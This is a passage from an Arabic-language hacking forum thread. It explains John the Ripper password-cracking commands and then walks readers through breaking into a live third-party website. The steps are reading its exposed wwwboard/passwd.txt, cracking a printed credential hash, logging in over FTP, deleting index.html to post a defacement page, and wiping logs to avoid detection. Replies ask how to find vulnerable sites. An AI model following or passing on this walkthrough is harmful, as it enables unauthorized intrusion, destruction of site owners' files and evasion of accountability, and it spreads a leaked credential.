    -=-=-=-=-=-=-=-=-=-=-=-
    3-امر يبحث لك عن الارقام فقط وصيغتة:
    john -iD:igits passwd.txt
    -=-=-=-=-=-=-=-=-=-=-=-
    4-امر يبحث عن الحروف الصغيرة:
    john -i:Alpha passwd.txt
    -=-=-=-=-=-=-=-=-=-=-=-
    5-امر يبحث لك عن جميع الاحتمالات الممكنة وصيغتة:
    john -i:all passwd.txt
    هذا الخيار اذا فشلت فيها كلها لانه طويل بس انه افضل اختيار
    -=-=-=-=-=-=-=-=-=-=-=-
    طيب انا اخترت اخر واحد وقعد البرنامج ساعة مافك ولا شئ وانا ماني فاضي له بخلي الكمبيوتر شغال وش اسوي؟
    عندي الحل اضغط كنترول + شفت +سي او
    كنترول+سي
    ctrl+shift+c
    ctrl+c
    -=-=-=-=-=-=-=-=-=-=-=-
    كيف اكمل ؟
    اكتب
    john -restore
    وهو يكمل
    -------------------------------------------------------------------------

    4-( نخترق موقع مع بعض)
    اول شي خلينا بالمواقع العادية مو نخترق الياهو مرة وحدة علما بأن اختراق المواقع العاديه سهل.
    الحين بعد ما قرأنا الدرس الكبير هذا وفهمناه نبي نطبق اللي فهمناه سوف نخترق موقع مع بعض.
    --------------------------
    البرامج اللازمة:
    Jonh the rippar
    WS_FTP pro
    -------------------------
    بسم الله نبدأ:
    1- الحين انا ما راح اتعبكم بالبحث عن موقع به ثغرات انا راح اعطيكم موقع فيه ثغرة وراح ننفذها وهو:
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    هذا الموقع مصاب بثغرة ملف الباسوورد اللي هي:
    wwwboard/passwd.txt
    الحين ننفذ الثغرة
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    علشان يطلع لينا اليوزر نيم والباسوورد:
    jc:GXQ4cN0fhbptw
    jc
    اليوزر نيم
    GXQ4cN0fhbptw
    هذا الباسوورد بس مشفر شلون نفك تشفيره علشان نحصل على الباسوورد الاصلي؟؟؟
    طبعا ببرنامج جون ذاريبر والشرح ماله فوق.
    اوكي فكينا التشفير والحين صار معانا الباسوورد واليوزر نيم مال الموقع خلاص تمت عمليه الاختراق.
    الحين نبي نكتب تم الاختراق بواسطة دارك بوي شلون ؟
    طبعا ببرنامج الفتب
    WS_FTP PRO
    اوكي الحين نحط الباسوورد واليوزر نيم بالبرنامج وندخل على الريموت مال الموقع .
    الحين اذا تبي تدمر الموقع طبعا تمحي الملفات الحين في بين الملفات ملف اسمه
    index.html
    هذا ملف الصفحة الرئيسية للموقع الحين احنا نكون مسويين الملف اللي كاتبين فيه تم اختراق هذا الموقع بواسطة دارك بوي من قبل الحين نمحي الملف اندكس مال الموقع وندخل الملف مالنا من الكومبيوتر بعد اختيار مكانه على الكومبيوتر.
    واللي ما يعرف يسوي صفحة اندكس يقولي انا اعلمه وكمثال عليها انا مسوي صفحة علشان بس اخترق موقع احطها وهي:
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    خلاص تم اختراق الموقع وترك رساله لصاحبه تم اختراق الموقع ....
    الحين علشان لا يعرفنا صاحب الموقع نروح ونمسح ملفات اللوقو اللي شرحهها فوق.
    الان بامكان اي احد قرأهذا الدرس اختراق مواقع عادية بس مو مثل الياهو.
    -----------------------------------------------------------------------
    5-(مواقع بها ثغرات)




    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    ثغرات فرونت بيج:
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    و
    avatar
    foruo


    عدد المساهمات : 3
    السٌّمعَة : 0
    تاريخ التسجيل : 12/08/2012

    جميع الطرق الي تخترق فيه موقع شرح كامل فقط على dev-hack Empty رد: جميع الطرق الي تخترق فيه موقع شرح كامل فقط على dev-hack

    مُساهمة من طرف foruo الأحد أغسطس 12, 2012 10:45 pm

    ولاهنت تقبل مروري بس الملعومــةة وهي انت عندك موقع ابي لاجيت تبي تخترق الموقع هي البحث عن ثغرةة للموقع هذ1 وش اول شي تسويـةة هل هو من رابط الموقع تعرف ولا من موقع بنج ولا من مواقع الثغرات

    انا مهو موقف بطريقي الا كيف ابي اعرف الموقع او السيرفر هذ1 فيـةة ثغرات بس
    avatar
    a6475596@drdrb.net


    عدد المساهمات : 1
    السٌّمعَة : 0
    تاريخ التسجيل : 27/06/2014

    جميع الطرق الي تخترق فيه موقع شرح كامل فقط على dev-hack Empty رد: جميع الطرق الي تخترق فيه موقع شرح كامل فقط على dev-hack

    مُساهمة من طرف a6475596@drdrb.net الجمعة يونيو 27, 2014 1:37 pm

    [/hide][/hide][/hide][/hide][/hide]
    avatar
    الكاسر


    عدد المساهمات : 1
    السٌّمعَة : 0
    تاريخ التسجيل : 28/07/2014

    جميع الطرق الي تخترق فيه موقع شرح كامل فقط على dev-hack Empty رد: جميع الطرق الي تخترق فيه موقع شرح كامل فقط على dev-hack

    مُساهمة من طرف الكاسر الإثنين يوليو 28, 2014 12:12 pm

    انا عندي اقو طريقة

      الوقت/التاريخ الآن هو الأربعاء مايو 01, 2024 6:52 pm